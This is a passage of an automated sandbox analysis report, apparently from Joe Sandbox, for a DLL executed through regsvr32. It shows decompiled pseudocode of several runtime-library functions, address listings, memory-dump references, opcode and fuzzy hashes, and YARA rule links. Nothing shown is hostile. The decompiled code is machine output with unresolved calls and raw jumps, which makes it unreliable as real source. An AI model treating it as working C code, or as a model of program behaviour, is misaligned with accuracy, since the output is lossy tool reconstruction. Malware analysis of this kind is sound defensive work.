				if (0x8000 == 0) goto 0x800090b8;
				_t134[1] = 2;
				goto 0x800090c2;
				 *_t134 = 0x8005f780;
				 *0x8007132c =  *0x8007132c - 1;
				return _t80;
			}

































                                                                                                              0x180008e04
                                                                                                              0x180008e04
                                                                                                              0x180008e04
                                                                                                              0x180008e04
                                                                                                              0x180008e04
                                                                                                              0x180008e09
                                                                                                              0x180008e0e
                                                                                                              0x180008e22
                                                                                                              0x180008e25
                                                                                                              0x180008e2b
                                                                                                              0x180008e31
                                                                                                              0x180008e35
                                                                                                              0x180008e37
                                                                                                              0x180008e3b
                                                                                                              0x180008e47
                                                                                                              0x180008e4c
                                                                                                              0x180008e58
                                                                                                              0x180008e5e
                                                                                                              0x180008e61
                                                                                                              0x180008e66
                                                                                                              0x180008e73
                                                                                                              0x180008e79
                                                                                                              0x180008e7c
                                                                                                              0x180008e85
                                                                                                              0x180008e8c
                                                                                                              0x180008e92
                                                                                                              0x180008e97
                                                                                                              0x180008e9e
                                                                                                              0x180008ea0
                                                                                                              0x180008ea3
                                                                                                              0x180008ead
                                                                                                              0x180008eaf
                                                                                                              0x180008eb8
                                                                                                              0x180008ebc
                                                                                                              0x180008ec1
                                                                                                              0x180008ec3
                                                                                                              0x180008eca
                                                                                                              0x180008ecf
                                                                                                              0x180008ed4
                                                                                                              0x180008ed6
                                                                                                              0x180008edf
                                                                                                              0x180008ee4
                                                                                                              0x180008ee7
                                                                                                              0x180008eeb
                                                                                                              0x180008eee
                                                                                                              0x180008ef0
                                                                                                              0x180008ef4
                                                                                                              0x180008ef6
                                                                                                              0x180008efc
                                                                                                              0x180008efe
                                                                                                              0x180008f01
                                                                                                              0x180008f04
                                                                                                              0x180008f08
                                                                                                              0x180008f10
                                                                                                              0x180008f12
                                                                                                              0x180008f15
                                                                                                              0x180008f18
                                                                                                              0x180008f1d
                                                                                                              0x180008f27
                                                                                                              0x180008f31
                                                                                                              0x180008f3b
                                                                                                              0x180008f48
                                                                                                              0x180008f4a
                                                                                                              0x180008f5d
                                                                                                              0x180008f65
                                                                                                              0x180008f6c
                                                                                                              0x180008f6f
                                                                                                              0x180008f79
                                                                                                              0x180008f83
                                                                                                              0x180008f8b
                                                                                                              0x180008f92
                                                                                                              0x180008f9c
                                                                                                              0x180008fa0
                                                                                                              0x180008fa7
                                                                                                              0x180008fab
                                                                                                              0x180008fbc
                                                                                                              0x180008fc5
                                                                                                              0x180008fc7
                                                                                                              0x180008fce
                                                                                                              0x180008fd2
                                                                                                              0x180008fd9
                                                                                                              0x180008fdd
                                                                                                              0x180008fee
                                                                                                              0x180008ffe
                                                                                                              0x180009003
                                                                                                              0x180009006
                                                                                                              0x180009009
                                                                                                              0x18000900c
                                                                                                              0x180009013
                                                                                                              0x180009018
                                                                                                              0x18000901a
                                                                                                              0x18000901e
                                                                                                              0x180009029
                                                                                                              0x18000902b
                                                                                                              0x18000902d
                                                                                                              0x180009033
                                                                                                              0x180009040
                                                                                                              0x180009046
                                                                                                              0x180009050
                                                                                                              0x180009055
                                                                                                              0x180009057
                                                                                                              0x18000905b
                                                                                                              0x18000905f
                                                                                                              0x180009063
                                                                                                              0x180009065
                                                                                                              0x180009072
                                                                                                              0x180009077
                                                                                                              0x18000907b
                                                                                                              0x18000907d
                                                                                                              0x180009082
                                                                                                              0x18000908e
                                                                                                              0x180009093
                                                                                                              0x18000909f
                                                                                                              0x1800090a4
                                                                                                              0x1800090a6
                                                                                                              0x1800090aa
                                                                                                              0x1800090b0
                                                                                                              0x1800090b2
                                                                                                              0x1800090b6
                                                                                                              0x1800090bf
                                                                                                              0x1800090c2
                                                                                                              0x1800090e7

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+
                                                                                                              • String ID:
                                                                                                              • API String ID: 2943138195-0
                                                                                                              • Opcode ID: f0ec88ef4cf4e92aa34862ccf87c9fcb1bcab843ce81abbd28ca294ced7158b6
                                                                                                              • Instruction ID: 9a704f9b7d398e866166ad7263ee13ae5f7d81770529f2a4de60bd863e3918cf
                                                                                                              • Opcode Fuzzy Hash: f0ec88ef4cf4e92aa34862ccf87c9fcb1bcab843ce81abbd28ca294ced7158b6
                                                                                                              • Instruction Fuzzy Hash: A6915D72A10B9889FB92CBA4D8403EC37B1F70C799F54C015EE8927B95DF798A49D740
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800095C4 Relevance: 6.1, APIs: 4, Instructions: 134COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+$NameName::
                                                                                                              • String ID:
                                                                                                              • API String ID: 168861036-0
                                                                                                              • Opcode ID: a5dcbd8f269222d9fdda71ed20b49dfbfc21c7ef031cb701fd6217a551d809c9
                                                                                                              • Instruction ID: 584908c0a383f9f7c10450ed07701c768c57bdfe79867d014ab2253bcd12ad0e
                                                                                                              • Opcode Fuzzy Hash: a5dcbd8f269222d9fdda71ed20b49dfbfc21c7ef031cb701fd6217a551d809c9
                                                                                                              • Instruction Fuzzy Hash: 3F513F72A29A5889FB92CFA4E8407EC37A1E34CBC9F54C011EA4D57796DF3AC649C740
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180056BE8 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 142388799-0
                                                                                                              • Opcode ID: 65381bc8b7ea58d450336793ec8bb37964537b8f60f6d57629bed186655c64e2
                                                                                                              • Instruction ID: b3f6badf230eb9c139b8ca524703726da410a5971ac8c5e3e596eec7f75b7ea6
                                                                                                              • Opcode Fuzzy Hash: 65381bc8b7ea58d450336793ec8bb37964537b8f60f6d57629bed186655c64e2
                                                                                                              • Instruction Fuzzy Hash: 6A21B671714A5881EBA18B25E8503AD7BA1F38CFE4F548312FEA957BE4CF39C6598700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180056D90 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FilePointer$ErrorLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 142388799-0
                                                                                                              • Opcode ID: 28bb86ed7eeb8a8a7f188ab0f6f9a19688226dbfaaf30c199adf610a89c8e5a6
                                                                                                              • Instruction ID: 74fd96d20431e6722dc0f76d50136617e3ca754d2706ebee416c768156fad0a2
                                                                                                              • Opcode Fuzzy Hash: 28bb86ed7eeb8a8a7f188ab0f6f9a19688226dbfaaf30c199adf610a89c8e5a6
                                                                                                              • Instruction Fuzzy Hash: F8118236714A5882E7A18B25E40039EB7A0F74CFD4F548222FE5967BA4CF39CA48CB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180012054 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 65%
                                                                                                              			E00000001180012054(void* __ecx, void* __eflags, void* __rcx, intOrPtr _a8, intOrPtr _a16, signed int _a24, void* _a32) {
				char _v80;
				signed long long _v96;
				long long _v104;
				long long _v136;
				signed long long _v144;
				signed int _v152;
				long long _v160;
				long long _v168;
				signed long long _v176;
				signed int _v184;
				void* __rbx;
				void* _t105;
				void* _t125;
				long long _t126;
				signed long long _t130;
				signed int _t131;
				long long _t133;
				signed long long _t135;
				long long _t154;
				intOrPtr* _t155;
				void* _t156;
				void* _t159;
				signed long long _t162;

				_t125 = _t156;
				r12d = 0;
				_v184 = r12d;
				_a24 = _a24 & r12d;
				_v176 = _v176 & _t162;
				_v152 = _v152 & _t162;
				 *((intOrPtr*)(_t125 - 0x80)) = r12b;
				 *(_t125 - 0x7c) =  *(_t125 - 0x7c) & r12d;
				 *(_t125 - 0x78) =  *(_t125 - 0x78) & r12d;
				 *(_t125 - 0x74) =  *(_t125 - 0x74) & r12d;
				 *(_t125 - 0x70) =  *(_t125 - 0x70) & r12d;
				 *(_t125 - 0x6c) =  *(_t125 - 0x6c) & r12d;
				E0000000118000E0F4(_t125);
				_t126 =  *((intOrPtr*)(_t125 + 0x28));
				_v160 = _t126;
				E0000000118000E0F4(_t126);
				_v168 =  *((intOrPtr*)(_t126 + 0x20));
				_t154 =  *((intOrPtr*)(__rcx + 0x50));
				_a32 = _t154;
				_t133 =  *((intOrPtr*)(__rcx + 0x40));
				_v136 =  *((intOrPtr*)(__rcx + 0x30));
				_v104 =  *((intOrPtr*)(__rcx + 0x48));
				_t130 =  *((intOrPtr*)(__rcx + 0x68));
				_v96 = _t130;
				_a16 =  *((intOrPtr*)(__rcx + 0x78));
				_a8 =  *((intOrPtr*)(__rcx + 0x38));
				E0000000118000525C( *((intOrPtr*)(__rcx + 0x38)), _t133);
				E0000000118000E0F4(_t130);
				 *((long long*)(_t130 + 0x20)) = _t154;
				E0000000118000E0F4(_t130);
				 *((long long*)(_t130 + 0x28)) = _t133;
				E0000000118000E0F4(_t130);
				E0000000118000F14C(_t130,  &_v80,  *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x20)) + 0x28)));
				_v144 = _t130;
				if ( *((intOrPtr*)(__rcx + 0x58)) == _t162) goto 0x80012156;
				_a24 = 1;
				E0000000118000E0F4(_t130);
				_v152 =  *((intOrPtr*)(_t130 + 0x70));
				r8d = 0x100;
				E000000011800130F0(_v136,  *((intOrPtr*)(__rcx + 0x28)), _t159);
				_v176 = _t130;
				if (_t130 - 2 >= 0) goto 0x8001218a;
				_t135 =  *((intOrPtr*)(_t156 - 0xa8 + 0x70 + _t130 * 8));
				if (_t135 == 0) goto 0x8001229d;
				_v176 = _t135;
				E00000001180013120(_t135,  *((intOrPtr*)(__rcx + 0x28)));
				_v184 = 1;
				E0000000118000E0F4(_t130);
				 *(_t130 + 0x40) =  *(_t130 + 0x40) & 0x00000000;
				E0000000118000E0F4(_t130);
				 *((intOrPtr*)(_t130 + 0x78)) = _a16;
				_t155 = _a32;
				if (_a24 == 0) goto 0x800121f1;
				E00000001180004F28(1, _t155);
				_t131 = _v152;
				r8d =  *((intOrPtr*)(_t131 + 0x18));
				goto 0x800121fe;
				r8d =  *((intOrPtr*)(_t155 + 0x18));
				RaiseException(??, ??, ??, ??);
				r12d = _v184;
				E0000000118000F188(_t131, _v176, _v144);
				if (r12d != 0) goto 0x8001225c;
				if ( *_t155 != 0xe06d7363) goto 0x8001225c;
				if ( *((intOrPtr*)(_t155 + 0x18)) != 4) goto 0x8001225c;
				if ( *((intOrPtr*)(_t155 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8001225c;
				if (E00000001180004FFC(_t131,  *((intOrPtr*)(_t155 + 0x28))) == 0) goto 0x8001225c;
				E00000001180004F28(1, _t155);
				E0000000118000E0F4(_t131);
				 *((long long*)(_t131 + 0x20)) = _v168;
				E0000000118000E0F4(_t131);
				 *((long long*)(_t131 + 0x28)) = _v160;
				E0000000118000E0F4(_t131);
				 *((intOrPtr*)(_t131 + 0x78)) = _a8;
				_t105 = E0000000118000E0F4(_t131);
				 *((intOrPtr*)(_t131 + 0x78)) = 0xfffffffe;
				return _t105;
			}


























                                                                                                              0x180012054
                                                                                                              0x18001206a
                                                                                                              0x18001206d
                                                                                                              0x180012072
                                                                                                              0x18001207a
                                                                                                              0x18001207f
                                                                                                              0x180012084
                                                                                                              0x180012088
                                                                                                              0x18001208c
                                                                                                              0x180012090
                                                                                                              0x180012094
                                                                                                              0x180012098
                                                                                                              0x18001209c
                                                                                                              0x1800120a1
                                                                                                              0x1800120a5
                                                                                                              0x1800120aa
                                                                                                              0x1800120b3
                                                                                                              0x1800120b8
                                                                                                              0x1800120bc
                                                                                                              0x1800120c4
                                                                                                              0x1800120cc
                                                                                                              0x1800120d9
                                                                                                              0x1800120de
                                                                                                              0x1800120e2
                                                                                                              0x1800120ea
                                                                                                              0x1800120f4
                                                                                                              0x1800120fe
                                                                                                              0x180012103
                                                                                                              0x180012108
                                                                                                              0x18001210c
                                                                                                              0x180012111
                                                                                                              0x180012115
                                                                                                              0x18001212a
                                                                                                              0x180012132
                                                                                                              0x18001213b
                                                                                                              0x18001213d
                                                                                                              0x180012148
                                                                                                              0x180012151
                                                                                                              0x180012156
                                                                                                              0x180012164
                                                                                                              0x18001216c
                                                                                                              0x180012175
                                                                                                              0x180012177
                                                                                                              0x18001217f
                                                                                                              0x180012185
                                                                                                              0x180012190
                                                                                                              0x1800121a1
                                                                                                              0x1800121a9
                                                                                                              0x1800121ae
                                                                                                              0x1800121b2
                                                                                                              0x1800121be
                                                                                                              0x1800121c1
                                                                                                              0x1800121d1
                                                                                                              0x1800121d8
                                                                                                              0x1800121dd
                                                                                                              0x1800121e6
                                                                                                              0x1800121ef
                                                                                                              0x1800121f5
                                                                                                              0x1800121fe
                                                                                                              0x180012204
                                                                                                              0x180012220
                                                                                                              0x180012228
                                                                                                              0x180012230
                                                                                                              0x180012236
                                                                                                              0x180012243
                                                                                                              0x180012250
                                                                                                              0x180012257
                                                                                                              0x18001225c
                                                                                                              0x180012261
                                                                                                              0x180012265
                                                                                                              0x18001226a
                                                                                                              0x18001226e
                                                                                                              0x18001227a
                                                                                                              0x18001227d
                                                                                                              0x180012282
                                                                                                              0x18001229c

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFrameInfo__except_validate_context_record
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 2558813199-1018135373
                                                                                                              • Opcode ID: 2f7cc0fb9988d89437276d29073ca030c043fb3a0ce298cfcca1defadeeb60dc
                                                                                                              • Instruction ID: ec1bb941499022fd6ae13348708c34666f64ee06683b9661c2c7995ede0d17b7
                                                                                                              • Opcode Fuzzy Hash: 2f7cc0fb9988d89437276d29073ca030c043fb3a0ce298cfcca1defadeeb60dc
                                                                                                              • Instruction Fuzzy Hash: A5514A32218B9896EAB1EB19E44039E77B4F38DBD0F148124EF9947B55DF38C5A5CB01
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004F180 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 64%
                                                                                                              			E0000000118004F180(signed int __edx, void* __eflags, intOrPtr* __rcx, void* __rdx, void* __r10) {
				char _v500;
				intOrPtr _v504;
				void* __rsi;
				void* _t23;
				void* _t24;
				void* _t28;
				void* _t33;

				r10d = __edx;
				r9d = 0x20;
				r10d = r10d >> 5;
				r14d = r9d;
				r14d = r14d - (__edx & 0x0000001f);
				r12d = 0;
				r15d = 0;
				asm("inc ecx");
				r15d =  !r15d;
				if (__eflags == 0) goto 0x8004f1d3;
				goto 0x8004f1d6;
				if (__rdx + __r10 - 0x73 <= 0) goto 0x8004f20f;
				 *__rcx = r12d;
				_v504 = r12d;
				r9d = 0;
				E0000000118005053C(_t23, _t24, __rcx + 4, __rdx, _t28,  &_v500, _t33);
				return 0;
			}










                                                                                                              0x18004f198
                                                                                                              0x18004f19b
                                                                                                              0x18004f1a1
                                                                                                              0x18004f1a5
                                                                                                              0x18004f1b0
                                                                                                              0x18004f1b6
                                                                                                              0x18004f1c1
                                                                                                              0x18004f1c4
                                                                                                              0x18004f1ca
                                                                                                              0x18004f1cd
                                                                                                              0x18004f1d1
                                                                                                              0x18004f1dd
                                                                                                              0x18004f1df
                                                                                                              0x18004f1eb
                                                                                                              0x18004f1f0
                                                                                                              0x18004f1f8
                                                                                                              0x18004f20e

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy_s
                                                                                                              • String ID: s
                                                                                                              • API String ID: 1502251526-453955339
                                                                                                              • Opcode ID: adca11eb4965f58866a5fe3ec2190c53a39a9308c980f66d3d41cf9476a4ce55
                                                                                                              • Instruction ID: 2abc7fd43cff767f97d8364bca8eb9fcee39e49fabe1d4535dd55220217e2540
                                                                                                              • Opcode Fuzzy Hash: adca11eb4965f58866a5fe3ec2190c53a39a9308c980f66d3d41cf9476a4ce55
                                                                                                              • Instruction Fuzzy Hash: 8C41F136304A4887E3B6CE54E584BFD77A1F39878CF129112EE0917B84CA78DA4ACB44
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003AE3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 23%
                                                                                                              			E0000000118003AE3C(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __r14;
				void* _t28;
				intOrPtr _t33;
				intOrPtr _t39;
				intOrPtr* _t62;
				long long _t68;
				long long _t84;
				signed int _t85;
				intOrPtr* _t86;
				void* _t96;

				_a8 = __rbx;
				r14d = __ecx;
				if (__ecx == 0) goto 0x8003afab;
				if (__rcx - 1 - 1 <= 0) goto 0x8003ae7a;
				0x80013b18();
				_t3 = _t85 + 0x16; // 0x16
				_t39 = _t3;
				 *__rax = _t39;
				0x80013928();
				goto 0x8003afab;
				r8d = 0x104;
				GetModuleFileNameW(??, ??, ??);
				_t86 =  *0x80071ee0; // 0xa262a
				 *0x80071eb8 = 0x80071590;
				if (_t86 == 0) goto 0x8003aeaa;
				if ( *_t86 != _t39) goto 0x8003aead;
				_t62 =  &_a32;
				_a24 = _t85;
				_v56 = _t62;
				r8d = 0;
				_a32 = _t85;
				_t28 = E0000000118003A8FC(0x80071590, 0x80071590, 0x80071590, _t85, 0x80071590, __r8,  &_a24, _t96);
				r8d = 2;
				E0000000118003AC54(_t28, _a24, _a32, __r8);
				_t68 = _t62;
				if (_t62 != 0) goto 0x8003af05;
				0x80013b18();
				 *_t62 = 0xc;
				E0000000118003F8F4(_t62, _a24);
				goto 0x8003ae73;
				_v56 =  &_a32;
				E0000000118003A8FC(_t68, 0x80071590, _t68, _t85, 0x80071590, _t62 + _a24 * 8,  &_a24, _t96);
				if (r14d != 1) goto 0x8003af3d;
				_t33 = _a24 - 1;
				 *0x80071ed0 = _t68;
				 *0x80071ec0 = _t33;
				goto 0x8003afa6;
				_a16 = _t85;
				0x80044014();
				if (_t33 == 0) goto 0x8003af6c;
				E0000000118003F8F4( &_a32, _a16);
				_a16 = _t85;
				E0000000118003F8F4( &_a32, _t68);
				goto 0x8003afab;
				_t84 = _a16;
				if ( *_t84 == _t85) goto 0x8003af87;
				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x8003af7b;
				 *0x80071ec0 = 0;
				_a16 = _t85;
				 *0x80071ed0 = _t84;
				E0000000118003F8F4(_t84 + 8, _t85 + 1);
				_a16 = _t85;
				E0000000118003F8F4(_t84 + 8, _t68);
				return _t33;
			}
















                                                                                                              0x18003ae3c
                                                                                                              0x18003ae51
                                                                                                              0x18003ae56
                                                                                                              0x18003ae62
                                                                                                              0x18003ae64
                                                                                                              0x18003ae69
                                                                                                              0x18003ae69
                                                                                                              0x18003ae6c
                                                                                                              0x18003ae6e
                                                                                                              0x18003ae75
                                                                                                              0x18003ae81
                                                                                                              0x18003ae8c
                                                                                                              0x18003ae92
                                                                                                              0x18003ae99
                                                                                                              0x18003aea3
                                                                                                              0x18003aea8
                                                                                                              0x18003aead
                                                                                                              0x18003aeb1
                                                                                                              0x18003aeb9
                                                                                                              0x18003aebe
                                                                                                              0x18003aec1
                                                                                                              0x18003aeca
                                                                                                              0x18003aed3
                                                                                                              0x18003aee0
                                                                                                              0x18003aee5
                                                                                                              0x18003aeeb
                                                                                                              0x18003aeed
                                                                                                              0x18003aef9
                                                                                                              0x18003aefb
                                                                                                              0x18003af00
                                                                                                              0x18003af17
                                                                                                              0x18003af1c
                                                                                                              0x18003af25
                                                                                                              0x18003af2a
                                                                                                              0x18003af2c
                                                                                                              0x18003af33
                                                                                                              0x18003af3b
                                                                                                              0x18003af41
                                                                                                              0x18003af48
                                                                                                              0x18003af51
                                                                                                              0x18003af57
                                                                                                              0x18003af5f
                                                                                                              0x18003af63
                                                                                                              0x18003af6a
                                                                                                              0x18003af6c
                                                                                                              0x18003af79
                                                                                                              0x18003af85
                                                                                                              0x18003af87
                                                                                                              0x18003af8f
                                                                                                              0x18003af93
                                                                                                              0x18003af9a
                                                                                                              0x18003afa2
                                                                                                              0x18003afa6
                                                                                                              0x18003afbd

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                              • String ID: *&
                                                                                                              • API String ID: 3580290477-3918557214
                                                                                                              • Opcode ID: fce620bd1ae90f0e3e331d820dfc6ad16abc3ceea60c707f4a72770d179c65b2
                                                                                                              • Instruction ID: d7c45443893fb2785d080d580d6003981c7ac0bc85b445d608dc2badea792d1d
                                                                                                              • Opcode Fuzzy Hash: fce620bd1ae90f0e3e331d820dfc6ad16abc3ceea60c707f4a72770d179c65b2
                                                                                                              • Instruction Fuzzy Hash: 12419072208B4889FB97DF25E8403EA37A4F7497C4F568026FE4A43B85DF3AC6498300
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018003A5A8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 18%
                                                                                                              			E0000000118003A5A8(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __r14;
				void* _t29;
				intOrPtr _t47;
				intOrPtr* _t61;
				long long _t67;
				long long _t82;
				signed int _t83;
				intOrPtr* _t84;
				void* _t90;
				void* _t94;

				_a8 = __rbx;
				r14d = __ecx;
				if (__ecx != 0) goto 0x8003a5cb;
				goto 0x8003a70d;
				if (__rcx - 1 - 1 <= 0) goto 0x8003a5eb;
				0x80013b18();
				 *__rax = 0x16;
				0x80013928();
				goto 0x8003a70d;
				r8d = 0x104;
				GetModuleFileNameW(??, ??, ??);
				_t84 =  *0x80071ee0; // 0xa262a
				 *0x80071eb8 = 0x80071590;
				if (_t84 == 0) goto 0x8003a61b;
				if ( *_t84 != 0) goto 0x8003a61e;
				_t61 =  &_a32;
				_a24 = _t83;
				_v56 = _t61;
				r8d = 0;
				_a32 = _t83;
				_t29 = E0000000118003A8FC(0x80071590, 0x80071590, 0x80071590, _t83, 0x80071590, _t90,  &_a24, _t94);
				r8d = 2;
				E0000000118003AC54(_t29, _a24, _a32, _t90);
				_t67 = _t61;
				if (_t61 != 0) goto 0x8003a66a;
				0x80013b18();
				_t10 = _t67 + 0xc; // 0xc
				_t47 = _t10;
				 *_t61 = _t47;
				goto 0x8003a69e;
				_v56 =  &_a32;
				E0000000118003A8FC(_t67, 0x80071590, _t67, _t83, 0x80071590, _t61 + _a24 * 8,  &_a24, _t94);
				if (r14d != 1) goto 0x8003a6a9;
				 *0x80071ed0 = _t67;
				 *0x80071ec0 = _a24 - 1;
				E0000000118003F8F4( &_a32, 0x80071590);
				goto 0x8003a70d;
				_a16 = _t83;
				0x80044014();
				if (_t47 == 0) goto 0x8003a6ca;
				E0000000118003F8F4( &_a32, _a16);
				goto 0x8003a6ff;
				_t82 = _a16;
